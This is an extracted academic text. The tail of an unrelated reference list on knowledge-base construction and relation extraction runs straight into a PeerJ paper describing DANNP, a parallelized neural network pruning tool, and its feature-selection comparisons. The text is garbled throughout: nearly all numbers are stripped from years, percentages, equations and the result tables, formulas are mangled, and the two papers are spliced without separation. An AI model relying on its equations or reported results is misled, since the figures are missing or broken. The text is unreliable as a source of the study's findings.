disam- biguation: a unified approach. tacl, : – . dana movshovitz-attias and william w. cohen. . kb-lda: jointly learning a knowledge base of hi- erarchy, relations, and facts. in proceedings of acl. ndapandula nakashole, gerhard weikum, and fabian m. suchanek. . patty: a taxonomy of rela- tional patterns with semantic types. in proceedings of emnlp-conll, pages – . vivi nastase and michael strube. . transform- ing wikipedia into a large scale multilingual concept network. artificial intelligence, : – . roberto navigli and simone paolo ponzetto. . ba- belnet: the automatic construction, evaluation and application of a wide-coverage multilingual seman- tic network. artificial intelligence, : – . roberto navigli and paola velardi. . learning word-class lattices for definition and hypernym ex- traction. in proceedings of acl, pages – . maria pershina, bonan min, wei xu, and ralph grish- man. . infusion of labeled data into distant su- pervision for relation extraction. in proceedings of acl, pages – . francesco piccinno and paolo ferragina. . from tagme to wat: a new entity annotator. in proceed- ings of erd, pages – . simone paolo ponzetto and michael strube. . tax- onomy induction based on a collaboratively built knowledge repository. artificial intelligence, ( - ): – . philip resnik. . selectional constraints: an information-theoretic model and its computational realization. cognition, ( - ): – . stephen d. richardson, william b. dolan, and lucy van- derwende. . mindnet: acquiring and structur- ing semantic information from text. in proceedings of acl, pages – . sebastian riedel, limin yao, and andrew mccallum. . modeling relations and their mentions with- out labeled text. in proceedings of ecml-pkdd, pages – . sebastian riedel, limin yao, andrew mccallum, and benjamin m. marlin. . relation extraction with matrix factorization and universal schemas. in pro- ceedings of naacl hlt, pages – . alan ritter, mausam, and oren etzioni. . a la- tent dirichlet allocation method for selectional pref- erences. in proceedings of acl, pages – . mark steedman. . the syntactic process. mit press, cambridge, ma, usa. mihai surdeanu, julie tibshirani, ramesh nallapati, and christopher d. manning. . multi-instance multi- label learning for relation extraction. in proceedings of emnlp-conll, pages – . denny vrandečić. . wikidata: a new platform for collaborative data collection. in proceedings of www, pages – . william yang wang, kathryn mazaitis, ni lao, tom m. mitchell, and william w. cohen. . efficient in- ference and learning in a large knowledge base - reasoning with extracted information using a locally groundable first-order probabilistic logic. machine learning, ( ): – . fei wu and daniel s. weld. . autonomously semantifying wikipedia. in proceedings of cikm, pages – . mohamed yahya, steven euijong whang, rahul gupta, and alon halevy. . renoun: fact extraction for nominal attributes. in proceedings of emnlp, pages – . submitted july accepted october published november corresponding author vladimir b. bajic, vladimir.bajic@kaust.edu.sa academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright alshahrani et al. distributed under creative commons cc-by . open access dannp: an efficient artificial neural network pruning tool mona alshahrani , othman soufan , arturo magana-mora , and vladimir b. bajic computational bioscience research center (cbrc), king abdullah university of science and technology (kaust), thuwal, saudi arabia computational bio big-data open innovation laboratory (cbbd-oil), national institute of advanced industrial science and technology (aist), tokyo, japan abstract background. artificial neural networks (anns) are a robust class of machine learning models and are a frequent choice for solving classification problems. however, deter- mining the structure of the anns is not trivial as a large number of weights (connection links) may lead to overfitting the training data. although several ann pruning algorithms have been proposed for the simplification of anns, these algorithms are not able to efficiently cope with intricate ann structures required for complex classification problems. methods. we developed dannp, a web-based tool, that implements parallelized versions of several ann pruning algorithms. the dannp tool uses a modified version of the fast compressed neural network software implemented in c++ to considerably enhance the running time of the ann pruning algorithms we implemented. in addition to the performance evaluation of the pruned anns, we systematically compared the set of features that remained in the pruned ann with those obtained by different state- of-the-art feature selection (fs) methods. results. although the ann pruning algorithms are not entirely parallelizable, dannp was able to speed up the ann pruning up to eight times on a -core machine, compared to the serial implementations. to assess the impact of the ann pruning by dannp tool, we used datasets from different domains. in eight out of the datasets, dannp significantly reduced the number of weights by %– %, while maintaining a competitive or better model performance compared to the unpruned ann. finally, we used a naïve bayes classifier derived with the features selected as a byproduct of the ann pruning and demonstrated that its accuracy is comparable to those obtained by the classifiers trained with the features selected by several state-of-the-art fs methods. the fs ranking methodology proposed in this study allows the users to identify the most discriminant features of the problem at hand. to the best of our knowledge, dannp (publicly available at www.cbrc.kaust.edu.sa/dannp) is the only available and on-line accessible tool that provides multiple parallelized ann pruning options. datasets and dannp code can be obtained at www.cbrc.kaust.edu.sa/dannp/data.php and https://doi.org/ . /zenodo. . subjects algorithms and analysis of algorithms, artificial intelligence, data mining and machine learning keywords artificial neural networks, pruning, parallelization, feature selection, classification problems, machine learning, artificial inteligence how to cite this article alshahrani et al. ( ), dannp: an efficient artificial neural network pruning tool. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:vladimir.bajic@kaust.edu.sa https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / www.cbrc.kaust.edu.sa/dannp www.cbrc.kaust.edu.sa/dannp/data.php https://doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. introduction artificial neural networks (anns) can arbitrarily well approximate non-linear target functions (bishop, ). an extensive empirical study (fernandez-delgado, cernadas & barro, ) demonstrated that a voting ensemble of anns achieved the best average performance over the uci machine learning repository on two-class classification problems. the anns have been extensively used for solving different classification problems, see, for example, (almeida, ; ashoor et al., ; bajic et al., ; bajic et al., ; bajic & werner, ; basheer & hajmeer, ; dias, antunes & mota, ; gan, chen & huang, ; gardnera & dorlinga, ; hatzigeorgiou, ; hernández- serna & jiménez-segura, ; jayne, iliadis & mladenov, ; kalkatawi et al., ; li et al., ; magana-mora et al., ; magana-mora & bajic, ; magana-mora, kalkatawi & bajic, ; meireles, almeida & simoes, ; wang et al., ). the anns are universal approximators, given a sufficiently rich model architecture and weights (hornik, stinchcombe & white, ), and may consist of multiple hidden layers. however, the multilayer ann representation rapidly increases model complexity due to the large number of tunable weights. moreover, the high number of weights may amplify irrelevant characteristics or noise that may be present in the training data and lead to a poor model generalization for unseen data. this problem is referred to as overfitting of the training data, and different methods have been proposed to address this undesirable effect. these methods may be broadly divided into three groups: ( ) ann regularization (ng, ; nowlan & hinton, ), ( ) early stopping (prechelt, ), and ( ) ann pruning (burden & winkler, ; reed, ; srivastava et al., ; wan et al., ). here, we focus on the ann pruning as it not only simplifies the model structure but also results in fewer computations and smaller storage requirements for the pruned network. in addition, as a side benefit, the ann pruning may keep the most useful features and rank their relevance based on their predictive capabilities. although there are different robust methods for performing feature selection (fs) and feature ranking, selection of the fs method and the parameters is not trivial. refer to soufan et al. ( b) for more details on fs. ann pruning algorithms may be divided into two categories. the simplest, magnitude- based pruning (mp) methods consist of removing weights with the lowest magnitudes. after a certain number of weights are deleted, the ann is retrained. while this approach may work for some problems, removing weights with the smallest magnitudes does not always produce the smallest increase of the error function (hassibi, stork & wolff, ). more sophisticated, the second category of pruning algorithms measures the sensitivity of the second-order information of the error function with respect to the weights. as a result, the weight that least increases the error function is removed (hassibi, stork & wolff, ; karnin, ; mozer & smolensky, ). these approaches usually result in more accurate models as they take advantage of the hessian matrix (referred to as h matrix, hereafter) to account for the additional curvature information of the error function (hassibi, stork & wolff, ). in this category of pruning algorithms, optimal brain damage (obd) (lecun et al., ) uses the second-order derivative of the error function relative to the network weights. the obd avoids the complexity of computing the h matrix by assuming diagonal h-matrix. nevertheless, this assumption is not true in many cases leading to the removal of alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the wrong weights (hassibi, stork & wolff, ), and therefore, affects the accuracy of the resulting models. in contrast to obd, the optimal brain surgeon (obs) algorithm (hassibi, stork & wolff, ) does not assume a diagonal h matrix. additionally, obs provides an approximation of the inverse h matrix (h- inverse) and is shown to produce more robust models than mp and obd algorithms (hassibi, stork & wolff, ). refer to article s for further details about these methods. however, the pruning of anns is a computationally expensive task that often limits its application to real-life problems where datasets may contain a large number of samples and data features. therefore, speeding up the pruning process is essential for many practical applications. although pruning algorithms of the obs types are not entirely parallelizable, certain computationally intensive parts are, which lead to a significant speedup on multicore processors. for the reasons mentioned above, this study aims to develop a user-friendly tool with several implemented parallelized ann pruning algorithms able to cope with complex or medium size data. for this, we developed dannp tool, which implements several parallelized variants of ann pruning algorithms. we demonstrated the efficiency and utility of the implemented algorithms in the dannp tool on several small to medium size benchmark datasets. moreover, as a useful by-product of the ann pruning, the pruning process selects the most useful data features for the problem in hand. the application of the fs methods to find a subset of features to train a classification model is often used to derive simpler and faster models. although in many cases the reduced number of features may result in improved performance, the feature subset is not always capable of describing the data accurately and may frequently result in models with inferior performance. in this study, we demonstrate that the selected features result in similar or improved classification performance in comparison with several state-of-the-art fs methods on the considered datasets. materials and methods in this section, we first define the hessian-based pruning algorithm and the implemented modifications for the parallelization of the code, followed by the details on the fs methods. finally, we describe the datasets and model evaluation procedure to assess the performance of the dannp tool. hessian-based pruning formulation and dannp parallelization the obs uses the second-order information of the error function and measures the saliency of the ann weights. the algorithm evaluates the saliency by the effect on the error function when the ann weight vector w is perturbed. therefore, the algorithm aims to determine the weights that cause the least increase of the error function e. the error function may be approximated by a taylor series as follows (hassibi, stork & wolff, ): e(w) ∼=e(w+ w)=e(w)+e′(w) w+ e ′′ (w) w +··· e =e(w+ w )−e(w)=e′(w) w+ e ′′ (w) w +··· e = e′(w) w+ wt h w+··· ( ) alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. where e′(w) is the first-order derivative of e with respect to w (the gradients vector); h is the h matrix determined as h =∂ e/∂w , i.e., as the second-order derivative of e with respect to w. the approximation of the h-inverse is obtained via an iterative procedure as follows (hassibi, stork & wolff, ): (hm+ )− =(hm)− − (hm)− ·gm+ w ·g [m+ ]t w ·(h m)− p+g[m+ ] t w ·(h m)− ·g[m+ ] w ( ) where ( h )− =α− i, i is the identity matrix and α is a small scalar; gm+ w is the gradient vector from the backpropagation calculations in iteration m+ , where m denotes the number of iterations; p is a scalar that represents the number of training samples. the h matrix is of size v , where v is the total number of weights in the network. the code optimization and parallelization of the pruning methods implemented in the dannp tool are achieved by ( ) implementation of a faster version of the algorithm for the approximation of the h-inverse, and ( ) reducing the number of evaluations of the h-inverse approximation. to address the faster algorithm for approximation of the h-inverse, we modified the implementation of the calculation of the h-inverse using, where applicable, optimized blas routines (blackford et al., ) and modified the code to reduce the overhead by computing repeated terms only once. however, since the approximation of the h-inverse is based on an iterative process (eq. ( )), this inherent limitation hinders full parallel scaling. algorithm describes the implementation of the parallel version of eq. ( ) based on the blas routines. to address the reduction of the number of evaluations of the h-inverse approximation, we implemented multiple-weights obs (mwobs-parallel), which removes multiple weights in each pruning iteration while using the optimization described in algorithm . in contrast to obs where the h-inverse has to be computed for removing a single weight, in mwobs-parallel this computation is performed only once for removing n weights, where the number of n weights is set to % of the weights in the initial ann. this approach significantly reduces the running time and frequently achieves comparable or better performance relative to the serial obs or the fully connected anns. ann model the ann models were derived by using a modified version of the fast compressed neural network software (klima, ). this software is a modular and fast c++ implementation of ann algorithms. we modified the software to use optimized blas to replace the serial approximation of the h-inverse update routines (using eq. ( )). in this study, we considered ann with a single layer as it has been demonstrated that one hidden layer, with a sufficient number of nodes and a sigmoid activation function, is enough to learn complex data patterns (cybenko, ; hornik, stinchcombe & white, ). however, our solutions apply to multilayer ann architecture. moreover, the resilient backpropagation algorithm (riedmiller, ) was used to train the ann as it frequently achieves faster convergence over the conventional backpropagation algorithm. finally, we considered a different number of nodes in the hidden layer for comparing the pruning effects of different algorithms. the total number of weights correlates with the alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm hessian inverse approximation : compute h− by approximation : initiate h− =α − i : for each training sample m : for each output unit k : update h− by using eq. ( ) : compute hgwx =h − ∗g : compute the denominator scalar d =p+gt ∗hgwx : compute the numerator and update using optimized blas routines h− m+ =h − m −(hgwx ⊗(hgwx ) t/d) : end for : end for note: operators∗ and⊗ refer to the matrix vector product and the outer product of two vectors, respectively. ann complexity and is calculated as follows: numweights=numinputs×numhnodes+numhnodes×numclasses ( ) where numinputs, numhnodes, and numclasses refer to the number of input features, the number of nodes in the hidden layer, and the number of classes in the classification problem, respectively. ann pruning solutions implemented in dannp tool the dannp tool implements the parallel versions of three obs-based approaches to ann pruning using the approximation of the h-inverse. these generate simpler structures and improve the model generalization with the least sacrifice in accuracy, compared to mp and obd. the implemented algorithms are obs-parallel, mwobs-parallel, and unit-based obs (uobs-parallel), which are described in the following subsections. however, we also provide the simple mp algorithm for the sake of comparison. we did not compare against obd algorithm as it has been shown that assuming a diagonal h matrix leads to the removal of wrong weights and produces inferior models (hassibi, stork & wolff, ). in our implementation, pruning algorithms continue to remove weights as long as the increase in the training mean-squared error (mse) is below % or stops when it reaches the pre-specified number of iterations. obs-parallel the obs algorithm aims to find the weight that when eliminated, it causes overall the least increase in the error function ei calculated according to ei= w i[ h− ] i ( ) where wi refers to the i-th weight that is to be removed. in this algorithm, the calculation of the h-inverse is required to remove a single weight per pruning iteration (fig. a). finally, the remaining weights in the network are updated to account for the removed weight (see article s for further details). alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. figure pruning variants of obs. (a) obs algorithm: a single weight (dashed line) is removed per pruning iteration. (b) mwobs algorithm: multiple weights (dashed lines) are removed per pruning itera- tion. (c) uobs algorithm: a node and its incoming/outgoing weights are removed in a pruning iteration. full-size doi: . /peerjcs. /fig- mwobs-parallel in contrast to obs, the mwobs algorithm may remove multiple weights in a single pruning iteration (fig. b). to achieve this, the error increase ei is evaluated individually for every weight in the network by using eq. ( ). weights are then sorted according to the increase of the associated errors and the n weights with the smallest error increase are selected for pruning, where n is set to % of the weighs in the initial ann. this simplification is made to avoid evaluating every combination of weights as described in the general formulation of pruning n weights using obs in stahlberger & riedmiller ( ). uobs-parallel the uobs variant described in stahlberger & riedmiller ( ) defines a heuristic that leads to removal of all outgoing weights of a particular node, thus reducing the overall number of considered nodes in the network (fig. c). we implemented this variant for the purpose of completeness, and integrated the optimized parallel approximation of the h-inverse in this approach, as indicated in algorithm . feature selection through ann pruning and comparison settings due to the simplification of the ann structure through pruning, it is possible that some of the input data features are not used in the pruned ann. this amounts to the fs in the wrapper setting. figure b shows an example of a pruned ann where input feature x is discarded (having no connecting weights from the input to the hidden layer). we ranked, in descending order, the remaining features (x and x , from the example) by considering, for each input feature, the sum of the absolute values of all outgoing weights. similar to the comprehensive analysis of fs methods performed in soufan et al. ( b), we analyzed the pruning effects of the mwobs-parallel variant on the features and compared it with the state-of-the-art methods for fs. we considered seven different fs methods from the feast matlab toolbox (brown et al., ), namely, conditional mutual information maximization (cmim) (fleuret, ), correlation-based fs (hall, ), joint mutual information (jmi) (yang & moody, ), maximum relevance minimum redundancy (mrmr) (peng, long & ding, ), relief (kira & rendell, alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table datasets summary. datasets number of features number of samples number of classes breast cancer (bc) heart disease (hd) wisconsin diag. breast cancer (wdbc) promoters prediction (pp) cardiac arrhythmia (ca) synthetic madelon (sm) , prostate cancer (pc) , tf-tf combination (tftf) , aid compounds (aid) , default credit cards (dcc) , epileptic seizure recognition (esr) , lsvt voice rehabilitation (lsvt) urban land cover (ulc) sensorless drive diagnosis (sdd) , human activity recognition (har) , mnist digits (md) , ), t-test (guyon & elisseeff, ), and receiver operating characteristic curve (roc) (guyon & elisseeff, ). refer to article s for more details on the fs methods. we used mwobs-parallel for determining the feature subsets, as it can cope with complex datasets and ann structures requiring short running times. since the selected features are the result of the ann pruning, using an ann to assess the performance of the feature subset may produce biased results. thus, we used a naïve bayes classifier to produce unbiased results with the so selected features. datasets we measured the performance of the implemented ann pruning algorithms, on datasets from different domains and one synthetic dataset, all with a different number of features and number of samples. the selected datasets reflect some of the data properties present in real applications, i.e., small or medium size datasets represented by both small and large number of features. from these datasets, seven are taken from the uci machine learning repository (lichman, ), and nine are obtained from recent studies (anguita et al., ; johnson & xie, ; schmeier, jankovic & bajic, ; singh et al., ; soufan et al., a; tsanas et al., ; wang et al., ; yeh & lien, ). table shows the summary information for these datasets. data processing and model evaluation feature values for all considered datasets were normalized to have values within the range of [− , ]. we used the k-fold cross-validation technique to estimate the performance of anns. k-fold cross-validation requires dividing the whole dataset into k subsets of similar size. we train the ann model on k− subsets and test it on the remaining subset. the alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. table statistical performance measures. tp, tn , fp and fn denote true positive, true negative, false positive and false negative predictions, respectively. for mse, m is the number of samples, y is the ann output value, and ti is the target value for the i-th sample. statistical measure equation accuracy tp+tntp+tn+fp+fn sensitivity tptp+fn specificity tntn+fp gm √ sensitivity×specificity mse m ∑m i= (y−ti) procedure repeats for each of the subsets and performance achieved is given as the average across all subsets. in this study, we used k= . we used several statistical measures to evaluate the k-fold cross-validation performance. these metrics are accuracy, sensitivity, specificity, geometric mean (gm), and mean squared error (mse). table defines the considered statistical performance metrics. in addition to these measures, table s shows the results using cohen’s kappa coefficient, recall, precision and f score. to evaluate the utility of the features obtained from the ann pruning, we compared the accuracy of a naïve bayes classifier generated with these selected features to the accuracy of naïve bayes classifiers generated with features selected by seven other fs methods. results and discussion here, we discuss in more details the speedup results obtained by the optimized parallel obs variants, the accuracy resulting from ann pruning and the effects on input features and weights. finally, we present and discuss the results of the comprehensive comparisons for several state-of-the-art methods for fs, with fs and ranking based on ann pruning. three variants of the obs pruning method using code parallelization are implemented in dannp: ( ) obs-parallel, which eliminates only one weight per iteration; ( ) mwobs- parallel, which is an obs variant that eliminates multiple weights per pruning iteration; and ( ) unit-based obs (uobs-parallel), which eliminates a whole node (unit) and their connecting weights per iteration. for the sake of comparison, we also include the simple mp method. running time speedup the speedup metric was used to quantify the running time reduction that we were able to achieve by parallelizing the calculation of the approximation of the h-inverse. the speedup is measured as follows: speedup= serial execution time parallel execution time . ( ) the performance gain obtained by parallelization is dictated by amdahl’s law, which states that the optimization of the code is limited by the execution time of the code that cannot be parallelized (amdahl, ). specifically, for anns pruning, the most computationally demanding portion of the program is the calculation of the h-inverse. alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. figure speedup comparisons of obs against obs-parallel and mwobs-parallel. (a–d) speedup comparison for datasets where the obs algorithm was completed within h. the y-axis shows the log of the speedup calculated from eq. ( ). the x-axis shows the number of nodes in the ann. full-size doi: . /peerjcs. /fig- therefore, we optimized the approximation of the h-inverse as described in algorithm . although mwobs-parallel was able to cope with the datasets that are described by a relatively large number of samples and input features (i.e., ca, sm, pc, tftf, aid, esr, lsvt, ulc, har, dcc, sdd, and md), the serial implementation of the obs was not able to produce an output in an acceptable amount of time (< h). therefore, figs. a– d show the speedup improvements of obs-parallel and mwobs-parallel over the non-parallel obs in four datasets (bc, hd, wdcb, and pp). table s shows the running time for the obs-parallel, mwobs-parallel, and uobs-parallel for the remaining datasets in which the obs was unable to complete the execution within h. results in fig. and table s show that obs-parallel consistently reduced the running time compared to the standard obs in the considered datasets. the mwobs-parallel achieved slower running times in the bc dataset with a small number of nodes in the hidden layer. this may be due to the possible time required to rank the weights based on the error increase (see the methods section). however, this overhead is marginal and may be ignored when increasing the number of weights in the ann (by increasing the number of nodes in the hidden layer or for datasets with more input features). the significant enhancements in the running time are noticeable for wdbc and pp datasets containing alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. table execution time comparison between the pruning variants and nnsysid matlab toolbox. execution time is measured in minutes. these comparison results should be taken cautiously since the dannp and nnsysid are written in different languages and run under different environments. dataset obs-parallel mwobs-parallel uobs-parallel mp nnsysid no. of weights bc . . . . . hd . . . . . wdbc . . . . . pp . . . . . ca . . . . > h , sm . . . . > h , pc . . > h . > h , tftf . . . . > h , aid . . . . > h , ulc . . . . . , sdd . . . . > h md . . . . > h , har . . . . > h , esr . . . . > h , lsvt . . . . > h , dcc . . . . . samples described by and input features, respectively. for instance, in an ann model with nodes in the hidden layer for pp dataset (containing , weights, from eq. ( )), the obs-parallel algorithm runs ∼ . times faster than the serial obs implementation. the main advantage of mwobs-parallel algorithms is that it requires fewer evaluations of the h-inverse and when coupled with a parallel approximation of the h-inverse, more speedup is achieved. furthermore, we compared the performance of the pruning variants implemented in dannp against the obs implementation in nnsysid matlab toolbox (norgaard, ravn & poulsen, ). the nnsysid is a toolbox for the identification of nonlinear dynamic systems with anns, often used as a benchmark, which implements several algorithms for ann training and pruning. the fair comparison between the dannp and nnsysid tools is not possible since nnsysid runs under matlab r b environment. still, to get an insight about how much time is needed for the same tasks with these two tools, the nnsysid and the pruning variants implemented in dannp were run under the same conditions. these include the same data partitioning, activation functions, hidden units, training algorithms, and tolerance level. data were partitioned into % testing, % validation, and % training. table shows the execution time comparison between dannp and nnsysid toolbox. for datasets with more features and samples, nnsysid fails to scale for datasets with a larger number of features. these results show the running time improvement obtained by our implementation to approximate the h-inverse. so far, we have only analyzed the running time of the implemented ann pruning algorithms. next, we discuss in details the effects of the pruning algorithms in the ann training error, cross-validation performance and on the fs resulting from the pruning. alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. effects of different pruning algorithms on the ann training error apart from the running time, the main difference in the ann pruning algorithms is the selection of the weights to be removed during a pruning iteration. to investigate the effects of the different ann pruning algorithms on the network, we evaluated the training performance through pruning steps until all weights are removed. the aim is to derive the simplest ann structure (smaller number of weights) without increasing the mse on the training data. figures a– j and fig. s show the effects of the different pruning algorithms on the mse. from these results, we observed that different pruning algorithms (including mp) were able to retain very few network weights without increasing the mse for some datasets (i.e., pc and pp). however, the mp algorithm produced the highest mse compared to the other algorithms for the remaining datasets. this is because the mp algorithm does not account for the effects of the removed weights on the network error (as mentioned in the ‘introduction’) and thus, tends to remove the incorrect weights, which may significantly increase the error. conversely, mwobs-parallel consistently achieved the minimum increase in the mse compared to the other pruning algorithms in all of the considered datasets. the application of obs-parallel and uobs-parallel algorithms is computationally prohibitive for anns with a large number of weights (i.e., for datasets with a higher number of input features or ann with a larger number of nodes in the hidden layer). as such, figs. a– e show the error curves for all pruning algorithms for smaller datasets (bc, hd, wdbc, pp, and ca) and figs. f– j and fig. s show the error curves only for mp and mwobs-parallel algorithms for the remaining datasets (pc, esr, lsvt, ulc, har, sm, tftf, aid, dcc, sdd, and md). from these results, we can generally conclude that in order to achieve the greatest reduction of the number of weights, while maintaining the lowest mse for ann during the training, the mwobs-parallel appears to consistently perform better than the other algorithms while being able to cope with more complex ann structures and datasets. estimates of model performance and pruning tradeoff less complex models are preferred over more complex as this may avoid overfitting the training data, helps increasing model interpretability, and helps reducing computation operations. in ann specifically, we analyze the effects of ann pruning on the cross- validation performance (see the methods section). figure shows the gm in the cross- validation and the number of weights in the pruned anns. notably, the pruning advantages may be seen in pc dataset, which originally requires a very complex ann structure as the samples are described by , input features. for pc dataset, the resulting ann from the mwobs-parallel retained ∼ weights as opposed to , weights in the unpruned ann (a reduction of % of the weights) with an improvement of . % in the gm. similarly, for pp and har datasets, we observe that mwobs-parallel reduced the number of weights by ∼ %, while achieving an improved performance with a gm of . %, compared to . % achieved by the unpruned ann for pp dataset, and . % compared to . % for har. the mwobs-parallel achieved similar results compared to the unpruned ann but it was able to reduce the number of weights by ∼ %, ∼ %, ∼ %,∼ %, %, %, and % for wdbc, esr, bc, md, sm, aid, and dcc datasets, alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. figure effects of different pruning algorithms on ann performance on the training data. (a–e) datasets for which all ann pruning algorithms were completed within a given time limit. (f–j) datasets for which only mp and mwobs-parallel algorithms were completed within a given time limit. the x-axis represents the number of remaining weights after each pruning iteration, while the y-axis shows the train- ing mse. full-size doi: . /peerjcs. /fig- alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure cross-validation performance and pruning trade-off. the colored bars represent the gm for each of the datasets, while the solid black line denotes the percentage of the remaining weights in the pruned ann. the uobs-parallel results for the pc dataset are not shown as the running time of the algo- rithm exceeded seven days. full-size doi: . /peerjcs. /fig- respectively. although mwobs-parallel considerably reduced the number of weights for hd, ulc, and sdd datasets, the mp algorithm achieved better results. finally, all pruning algorithms achieved worse performance than the unpruned ann in tftf dataset with a reduction of ∼ . % in the gm. table s shows the accuracy, precision, recall, f score, cohen’s kappa coefficient, and the percentage of the remaining weights in the ann for each dataset. ideally, we would hope that the pruned anns consistently achieve better results than the unpruned ann. however, the pruning effects are data dependent and may result in anns that, depending on the problem, show better, similar or worse performance compared to the unpruned anns. in this regard, the friedman’s test indicates that there is no significant difference (p-value of . ) in the gm performance between the unpruned and pruned anns by the different algorithms on our datasets. nevertheless, the pruned anns are considerably simpler, which reduces the computation demands and increases the interpretability of the model. moreover, the simpler models may arguably perform better for unseen samples, as the simpler models in principle generalize better because they are less likely to overfit the training data. overall, results in fig. show that our solutions are suitable for datasets with a small to a medium number of samples described by a relatively large number of input features. this is frequently the case for many classification problems in real applications. more importantly, mwobs-parallel can cope with complex ann structures where other pruning algorithms require considerably longer running times. alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. ann pruning effects on data features and comparison to feature selection methods in addition, we exploit the resulting pruned ann for assessing and ranking the relevance of the data features. in this regard, we considered the selected features by the ann pruning and compared their predictive accuracy with seven state-of-the-art methods for fs. although there have been several attempts to use ann in fs for certain applications (becker & plumbley, ; dong & zhou, ; kaikhah & doddameti, ; setiono & leow, ), there are much faster and more efficient approaches for this guyon & elisseeff ( ). however, we show that through ann pruning, we can obtain more insights into the data by ranking and selecting the discriminative features, which is an additional information for users to explore for the problem at hand. as observed in fig. , pruning algorithms may significantly decrease the number of weights in an ann. with this reduction, some input features may lose their connecting weights to all nodes in the hidden layer (e.g., x in fig. b). this may help to infer the significance of the input features in a dataset. to demonstrate this, we performed pruning for the anns derived from the datasets until the mse exceeded a threshold on the validation data and discarded all input features without weights to the hidden layer. we then re-trained the ann using only the remaining features to observe how they affected the ann training and testing performance. table shows the gm for the anns derived by using the original set of features and the anns derived using the subset of features that had at least one connecting weight to the hidden layer after the ann pruning. consistent with fig. f, ann pruning selected only % of the features ( out of , ) for pc dataset while improving the gm by ∼ . % compared to the more complex ann derived using the original feature set. in general, eight datasets (pc, aid, sm, ca, lsvt, tftf, har, and wdbc) show a considerable reduction of the input features (from % to %). the achieved gm of the ann derived using the feature subset from pruning improved in eight datasets (sm, pc, tftf, aid, ulc, har, esr, and lsvt), remained relatively the same on four datasets (bc, wdbc, dcc, and md), and decreased in four (hd, pp, ca, and sdd). these results suggest that some classification problems are described with a less redundant set of features, or that the fs methods were not able to discriminate well the redundant from the non-redundant set of features. as such, the negative effects of fs on the gm for hd, pp, ca and sdd datasets indicate that fs may not be useful for all datasets. this may be the case when the data samples are defined by an already small number of highly non-redundant features (as in hd dataset) or simply when the features are weakly or not correlated. nevertheless, the wilcoxon signed rank test indicates that anns using a reduced feature set perform equally well compared to the unpruned anns (p-value of . ), while being considerably simpler and possibly more generalizable. here, we should note that for nine datasets (wdbc, sm, pc, tftf, aid, ulc, har, esr, and lsvt) out of , the pruned anns achieved better performance than the unpruned anns. although the results from table give an insight of the effects of the fs by ann pruning, we asked how would this compare to other fs methods. for this, we performed a comprehensive analysis to investigate the ann pruning effects on the input alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table selection of the input features through the ann pruning and the effect on performance. the anns were trained on % of the data using the selected feature set, % was used for validation and % for testing. the bolded numbers represent the highest achieved performance with pruned and/or un- pruned network. dataset remaining input features (%) gm (%) % (unpruned) . breast cancer (bc) % (pruned) . % (unpruned) . heart disease (hd) % (pruned) . % (unpruned) . wisconsin breast cancer (wdbc) % (pruned) . % (unpruned) . promoters prediction (pp) % (pruned) . % (unpruned) . cardiac arrhythmia (ca) % (pruned) . % (unpruned) . synthetic madelon (sm) % (pruned) . % (unpruned) . prostate cancer (pc) % (pruned) . % (unpruned) . tf-tf combinations (tftf) % (pruned) . % (unpruned) . aid compounds (aid) % (pruned) . % (unpruned) . urban land cover (ulc) % (pruned) . % (unpruned) . sensorless drive diagnosis (sdd) % (pruned) . % (unpruned) . default credit cards (dcc) % (pruned) . % (unpruned) . human activity recognition (har) % (pruned) . % (unpruned) . epileptic seizure recognition (esr) % (pruned) . % (unpruned) . lsvt voice rehabilitation (lsvt) % (pruned) . % (unpruned) . mnist digits (md) % (pruned) . features using mwobs-parallel, and compared it with seven state-of-the-art methods for fs. figures a– p show the comparison of the cross-validation results obtained from a naïve bayes classifier derived by using the different subsets of features. interestingly, when considering % or more of the top ranked features, the feature subset determined by mwobs-parallel outperformed all methods for fs in two datasets (har and ulc). moreover, the feature subset obtained through mwobs-parallel consistently achieved comparable performance in the remaining datasets compared to the other methods for fs, alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure performance comparison between the methods for fs and mwobs-parallel. (a–p) cross- validation accuracy results (see the methods section) obtained from a naïve bayes classifier derived by us- ing different feature subsets. full-size 